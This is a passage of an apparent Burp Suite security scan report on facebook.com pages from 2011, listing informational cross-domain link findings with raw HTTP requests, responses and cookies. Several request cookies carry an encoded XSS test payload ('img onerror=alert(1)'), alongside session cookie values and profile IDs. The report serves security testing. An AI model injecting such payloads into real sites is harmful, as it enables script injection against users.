Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.27
Connection: close
Date: Thu, 05 May 2011 11:43:05 GMT
Content-Length: 20587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yL/r/OuCKQjrVamz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/s6-0HGzUYdH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/Sxn9HcQx7-s.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yU/r/mT_qphTsZ8l.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/F6vZSVqitFo.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/lT0Sbz7GQzD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/TP-A71t1sFT.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yk/r/G56BmZyYUs2.png" alt="" width="23" height="23" /><div class="clearfix selected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/VVIvW-eIGKG.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yy/r/uunxaUcHMsN.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/hapiV4URFzS.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yr/r/GzjD8q3xBN2.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yG/r/CYgI95uCQNj.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...

16.37. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/help/?page=432
The response contains the following links to other domains:
  • http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/CYgI95uCQNj.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HZ2miH23DO_.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/hapiV4URFzS.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/VVIvW-eIGKG.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/qdjc8Os7vL6.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/nKcHzwvsYY2.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/zhBrOmLKnYo.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/uunxaUcHMsN.png
  • http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /help/?page=432 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; act=1304613664644%2F2; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.83
X-Cnection: close
Date: Thu, 05 May 2011 11:44:03 GMT
Content-Length: 24931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/zhBrOmLKnYo.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/qdjc8Os7vL6.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HZ2miH23DO_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/nKcHzwvsYY2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<span class="imgWrap"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/VVIvW-eIGKG.png" alt="" width="23" height="23" /></span>
...[SNIP]...
<span class="imgWrap"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/uunxaUcHMsN.png" alt="" width="23" height="23" /></span>
...[SNIP]...
<span class="imgWrap"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/hapiV4URFzS.png" alt="" width="23" height="23" /></span>
...[SNIP]...
<span class="imgWrap"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/CYgI95uCQNj.png" alt="" width="23" height="23" /></span>
...[SNIP]...

16.38. http://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/login.php?next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D1242845259
The response contains the following links to other domains:
  • http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/3GUx1LLG0cl.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
  • http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /login.php?next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; _e_vm3q_0=%5B%22vm3q%22%2C1304617033840%2C%22act%22%2C1304617032828%2C1%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C73%2C218%2C0%2C1006%2C16%5D; act=1304617037875%2F2; _e_vm3q_1=%5B%22vm3q%22%2C1304617037875%2C%22act%22%2C1304617037875%2C2%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C197%2C146%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_vm3q_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: _e_vm3q_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 12:46:07 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.101.59
X-Cnection: close
Date: Thu, 05 May 2011 12:46:07 GMT
Content-Length: 18187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/3GUx1LLG0cl.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

16.39. http://www.facebook.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/mobile/?ref=pf
The response contains the following links to other domains:
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/9czF9X7LzHI.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/r6TQE2hmDzI.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/UQfC_F8UZ7s.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css
  • http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico
  • http://www.microsoft.com/windowsphone

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; act=1304613659940%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613659942%2C%22act%22%2C1304613659940%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C469%2C478%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.25
X-Cnection: close
Date: Thu, 05 May 2011 11:41:04 GMT
Content-Length: 17082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/UQfC_F8UZ7s.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/9czF9X7LzHI.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div class="promo_image"><img class="Facebook Mobile img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/r6TQE2hmDzI.png" width="362" height="124" /></div>
...[SNIP]...
<div class="navItem"><a href="http://www.microsoft.com/windowsphone" target="_blank" rel="nofollow" title="Windows Phone" onmousedown="UntrustedLink.bootstrap($(this), &quot;c4dbd&quot;, event, bagof(null));">Windows Phone</a>
...[SNIP]...

16.40. http://www.facebook.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/mobile/?ref=pf
The response contains the following links to other domains:
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/9czF9X7LzHI.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/iYv5KPjJjnb.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/UQfC_F8UZ7s.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css
  • http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php; act=1304613654644%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613654661%2C%22act%22%2C1304613654644%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%3Fref%3Dpf%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C361%2C635%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.138.55
X-Cnection: close
Date: Thu, 05 May 2011 11:43:37 GMT
Content-Length: 17153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/UQfC_F8UZ7s.css" />
